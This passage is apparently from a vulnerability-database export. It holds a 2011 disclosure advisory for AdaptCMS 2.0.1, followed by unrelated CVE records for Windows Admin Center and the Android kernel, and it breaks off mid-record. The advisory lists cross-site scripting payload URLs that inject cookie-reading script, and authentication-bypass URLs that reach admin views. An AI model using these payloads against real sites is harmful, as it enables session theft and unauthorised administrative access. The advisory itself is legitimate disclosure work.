{"id": "SECURITYVULNS:DOC:27066", "bulletinFamily": "software", "title": "AdaptCMS 2.0.1 Multiple security vulnerabilities", "description": "Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities\r\nAdvisory ID: \tSSCHADV2011-018\r\nAuthor: \tStefan Schurtz\r\nAffected Software: Successfully tested on AdaptCMS 2.0.1\r\nVendor URL: http://www.adaptcms.com/\r\nVendor Status: fixed\r\nCVE-ID: \t-\r\n\r\n==========================\r\nVulnerability Description:\r\n==========================\r\n\r\nAdaptCMS 2.0.1 is prone to multiple security vulnerabilities\r\n\r\n==================\r\nTechnical Details:\r\n==================\r\n\r\nCross-site Scripting\r\n\r\nhttp://<target>/AdaptCMS/admin.php?view=</script><script>alert(documentcookie)</script>\r\nhttp://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>\r\nhttp://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>\r\nhttp://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>\r\n\r\nAuthentication bypass / Information Disclosure\r\n\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=settings\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=users\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=groups\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=levels\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=stats\r\n\r\n=========\r\nSolution:\r\n=========\r\n\r\n"Get the latest AdaptCMS Files" from the admin area\r\n\r\n====================\r\nDisclosure Timeline:\r\n====================\r\n\r\n24-Sep-2011 - informed developers\r\n24-Sep-2011 - Release date of this security advisory\r\n25-Sep-2011 - fixed by vendor\r\n25-Sep-2011 - post on BugTraq\r\n\r\n========\r\nCredits:\r\n========\r\n\r\nVulnerabilities found and advisory written by Stefan Schurtz.\r\n\r\n===========\r\nReferences:\r\n===========\r\n\r\nhttp://www.adaptcms.com/\r\nhttp://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole\r\nhttp://www.rul3z.de/advisories/SSCHADV2011-018.txt\r\n", "published": "2011-09-26T00:00:00", "modified": "2011-09-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27066", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 16, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2018-08-31T11:10:42", "rev": 2}, "dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2020-1364"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY"]}, {"type": "thn", "idList": ["THN:9F1824BD0EEB6A1695B53AE380D04BF9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157528"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2192.NASL", "EULEROS_SA-2020-1555.NASL", "EULEROS_SA-2020-1547.NASL", "EULEROS_SA-2020-1553.NASL", "EULEROS_SA-2020-1532.NASL", "EULEROS_SA-2020-1571.NASL", "EULEROS_SA-2020-1563.NASL", "EULEROS_SA-2020-1527.NASL", "EULEROS_SA-2020-1574.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892192", "OPENVAS:1361412562311220201532", "OPENVAS:1361412562311220201527", "OPENVAS:1361412562311220201547"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2192-1:E4FCE"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0565-1"]}, {"type": "mskb", "idList": ["KB317244"]}], "modified": "2018-08-31T11:10:42", "rev": 2}, "vulnersScore": 3.8}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"cve": [{"id": "CVE-2021-27066", "bulletinFamily": "NVD", "title": "CVE-2021-27066", "description": "Windows Admin Center Security Feature Bypass Vulnerability", "published": "2021-03-11T16:15:00", "modified": "2021-03-16T15:24:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27066", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066"], "cvelist": ["CVE-2021-27066"], "type": "cve", "lastseen": "2021-04-28T11:49:16", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-27066"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Windows Admin Center Security Feature Bypass Vulnerability", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-03-12T14:37:46", "references": [{"idList": ["MS:CVE-2021-27066"], "type": "mscve"}, {"idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"], "type": "rapid7blog"}], "rev": 2}, "score": {"modified": "2021-03-12T14:37:46", "rev": 2, "value": 3.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066"}], "hash": "e7a8315c4c41a37050268111e8d3f76d57635696c35994e595840ee254f0ce72", "hashmap": [{"hash": "8fb0fbb204df1a26474d68c0b0691b6c", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "54e03c74a05f5352d0c8387aed0a209d", "key": "published"}, {"hash": "cd158f055c6fb2f031aaf9db24734e1d", "key": "title"}, {"hash": "304865daba6452a2f9e7f78965b8238f", "key": "href"}, {"hash": "1120cbc681d6c0ac2c82267924046b19", "key": "description"}, {"hash": "1dca09845656fa5db8545feaa4713717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "ebef1390c771ea3436eb82e39b678dc5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d3e336e0f0d9983620ee4aa9560352ca", "key": "extraReferences"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27066", "id": "CVE-2021-27066", "lastseen": "2021-03-12T14:37:46", "modified": "2021-03-11T16:26:00", "objectVersion": "1.3", "published": "2021-03-11T16:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066"], "reporter": "cve@mitre.org", "title": "CVE-2021-27066", "type": "cve", "viewCount": 2}, "differentElements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-03-12T14:37:46"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_admin_center", "name": "microsoft windows admin center", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:windows_admin_center:-"], "cpe23": ["cpe:2.3:a:microsoft:windows_admin_center:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:windows_admin_center:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-27066"], "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "cwe": ["NVD-CWE-noinfo"], "description": "Windows Admin Center Security Feature Bypass Vulnerability", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-03-17T12:32:32", "references": [{"idList": ["MS:CVE-2021-27066"], "type": "mscve"}, {"idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"], "type": "rapid7blog"}], "rev": 2}, "score": {"modified": "2021-03-17T12:32:32", "rev": 2, "value": 3.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066"}], "hash": "68aa439cbe640c7854e877d09300313967c79e35afbfb121d8f8bf0e8a15a32e", "hashmap": [{"hash": "8fb0fbb204df1a26474d68c0b0691b6c", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "07a69fb94693e6a2da876529ddd1e0ec", "key": "cvss2"}, {"hash": "54e03c74a05f5352d0c8387aed0a209d", "key": "published"}, {"hash": "9a7127d11cb38410631159c9dd118201", "key": "cpe23"}, {"hash": "cd158f055c6fb2f031aaf9db24734e1d", "key": "title"}, {"hash": "304865daba6452a2f9e7f78965b8238f", "key": "href"}, {"hash": "58b50e9e0eb8726ee382da4e6e8ada5b", "key": "affectedSoftware"}, {"hash": "1120cbc681d6c0ac2c82267924046b19", "key": "description"}, {"hash": "1dca09845656fa5db8545feaa4713717", "key": "cvelist"}, {"hash": "4bc1a43846deefccb3b498ef84996d3f", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ed7b03ce0d4f22d7c6d8e1fb53e3e662", "key": "modified"}, {"hash": "cf88635ce4768f12bebbeb1807a64961", "key": "cpeConfiguration"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9f01cf4931e88eaebbddbdd3a6cace55", "key": "extraReferences"}, {"hash": "e258b79b31d39a327c9dafeb61b7a729", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a0c1192230bfbfde65249ef271729103", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27066", "id": "CVE-2021-27066", "immutableFields": [], "lastseen": "2021-03-17T12:32:32", "modified": "2021-03-16T15:24:00", "objectVersion": "1.5", "published": "2021-03-11T16:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066"], "reporter": "cve@mitre.org", "title": "CVE-2021-27066", "type": "cve", "viewCount": 5}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-03-17T12:32:32"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "58b50e9e0eb8726ee382da4e6e8ada5b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a0c1192230bfbfde65249ef271729103"}, {"key": "cpe23", "hash": "9a7127d11cb38410631159c9dd118201"}, {"key": "cpeConfiguration", "hash": "14e84a9a73575026a75cd552d9998974"}, {"key": "cvelist", "hash": "1dca09845656fa5db8545feaa4713717"}, {"key": "cvss", "hash": "e258b79b31d39a327c9dafeb61b7a729"}, {"key": "cvss2", "hash": "07a69fb94693e6a2da876529ddd1e0ec"}, {"key": "cvss3", "hash": "4bc1a43846deefccb3b498ef84996d3f"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "1120cbc681d6c0ac2c82267924046b19"}, {"key": "extraReferences", "hash": "9f01cf4931e88eaebbddbdd3a6cace55"}, {"key": "href", "hash": "304865daba6452a2f9e7f78965b8238f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "ed7b03ce0d4f22d7c6d8e1fb53e3e662"}, {"key": "published", "hash": "54e03c74a05f5352d0c8387aed0a209d"}, {"key": "references", "hash": "8fb0fbb204df1a26474d68c0b0691b6c"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "cd158f055c6fb2f031aaf9db24734e1d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "76e71fcecefa0b8aaad29067a7d396891dde73a044d0d449c1a22631e93ce8d3", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-04-28T11:49:16", "rev": 2}, "score": {"value": 3.7, "vector": "NONE", "modified": "2021-04-28T11:49:16", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:windows_admin_center:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_admin_center", "name": "microsoft windows admin center", "operator": "eq", "version": "-"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:windows_admin_center:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "cpe23": ["cpe:2.3:a:microsoft:windows_admin_center:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null, "immutableFields": []}, {"id": "CVE-2020-27066", "bulletinFamily": "NVD", "title": "CVE-2020-27066", "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168043318", "published": "2020-12-15T17:15:00", "modified": "2021-07-21T11:39:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27066", "reporter": "security@android.com", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01"], "cvelist": ["CVE-2020-27066"], "type": "cve", "lastseen": "2021-08-04T16:55:14", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "google:android", "name": "google android", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:google:android:-"], "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-27066"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168043318", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-04-23T01:09:45", "references": [{"idList": ["UB:CVE-2020-27066"], "type": "ubuntucve"}, {"idList": ["RH:CVE-2020-27066"], "type": "redhatcve"}], "rev": 2}, "score": {"modified": "2021-04-23T01:09:45", "rev": 2, "value": 6.4, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2020-12-16T17:49:22", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1339462989037137921", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/EALrcIKTmT?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1339463049674186752", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/2wwZKNJbFR?amp=1"}]}}, "extraReferences": [{"name": "https://source.android.com/security/bulletin/pixel/2020-12-01", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://source.android.com/security/bulletin/pixel/2020-12-01"}], "hash": "733167172ab56148cc479f400fb522fc141b5fc390019e8cf43ec09a28d04898", "hashmap": [{"hash": "4275e05fc9dec0096fb711c238aee426", "key": "modified"}, {"hash": "f1e904fa0373499fda428d90eebfb21d", "key": "reporter"}, {"hash": "8aebd2ba46c74298d7bb0dd15b35639f", "key": "extraReferences"}, {"hash": "8deec174a952bd595eabdefd2eea839c", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "4e19edaff9d65a836fa3b1c95015bf46", "key": "references"}, {"hash": "2d1ac5022c4f9a85e7eabd973ed53781", "key": "title"}, {"hash": "455a0fe19695409c917838c86dd8a67d", "key": "cpe23"}, {"hash": "76b16b96b47bcc7358b26f2b97e3924d", "key": "cpe"}, {"hash": "ecb3a5cc08756774f67974fbee71fec8", "key": "description"}, {"hash": "80e7882a30277a24bc8cfe4240c76dca", "key": "cvelist"}, {"hash": "fab3ed7cc7f93696c67f7fa2360d4b1a", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "8ee1fc0287b899f61c2e8e573233ef06", "key": "href"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "45f6d1c174d2b45f4428222ab35b401a", "key": "cpeConfiguration"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23d773d8ec2bff69ab6442c5c7510dc5", "key": "published"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27066", "id": "CVE-2020-27066", "immutableFields": [], "lastseen": "2021-04-23T01:09:45", "modified": "2020-12-17T02:28:00", "objectVersion": "1.5", "published": "2020-12-15T17:15:00", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01"], "reporter": "security@android.com", "title": "CVE-2020-27066", "type": "cve", "viewCount": 5}, "different_elements": ["modified"], "edition": 4, "lastseen": "2021-04-23T01:09:45"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "google:android", "name": "google android", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:google:android:-"], "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-27066"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168043318", "edition": 3, "enchantments": {"dependencies": {"modified": "2021-02-02T07:37:04", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T07:37:04", "rev": 2, "value": 6.4, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2020-12-16T17:49:22", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1339462989037137921", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/EALrcIKTmT?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1339463049674186752", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-27066 (android)) has been published on https://t.co/2wwZKNJbFR?amp=1"}]}}, "extraReferences": [{"name": "https://source.android.com/security/bulletin/pixel/2020-12-01", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://source.android.com/security/bulletin/pixel/2020-12-01"}], "hash": "a3bdf141391e9e2135072f2e1efadf4949e592721468b12cfbe989efe6a409eb", "hashmap": [{"hash": "4275e05fc9dec0096fb711c238aee426", "key": "modified"}, {"hash": "8aebd2ba46c74298d7bb0dd15b35639f", "key": "extraReferences"}, {"hash": "8deec174a952bd595eabdefd2eea839c", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "4e19edaff9d65a836fa3b1c95015bf46", "key": "references"}, {"hash": "2d1ac5022c4f9a85e7eabd973ed53781", "key": "title"}, {"hash": "455a0fe19695409c917838c86dd8a67d", "key": "cpe23"}, {"hash": "76b16b96b47bcc7358b26f2b97e3924d", "key": "cpe"}, {"hash": "ecb3a5cc08756774f67974fbee71fec8", "key": "description"}, {"hash": "80e7882a30277a24bc8cfe4240c76dca", "key": "cvelist"}, {"hash": "fab3ed7cc7f93696c67f7fa2360d4b1a", "key": "affectedSoftware"}, {"hash": "ebc89252fcbfd7d9a590240d002f9b82", "key": "cpeConfiguration"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "8ee1fc0287b899f61c2e8e573233ef06", "key": "href"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23d773d8ec2bff69ab6442c5c7510dc5", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27066", "id": "CVE-2020-27066", "immutableFields": [], "lastseen": "2021-02-02T07:37:04", "modified": "2020-12-17T02:28:00", "objectVersion": "1.5", "published": "2020-12-15T17:15:00", "references": ["https://source.android.com/security/bulletin/pixel/2020-12-01"], "reporter": "cve@mitre.org", "title": "CVE-2020-27066", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 3, "lastseen": "2021-02-02T07:37:04"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "google:android", "name": "google android", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:google:android:-"], "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-27066"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "In xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168043318", "edition": 5, "enchantments": {"dependencies": {"modified": "2021-07-22T08:54:32", "references": [{"idList": ["UB:CVE-2020-27066"], "type": "ubuntucve"}, {"idList": ["RH:CVE-2020-27066"], "type": "redhatcve"}], "rev": 2}, "score": {"modified": 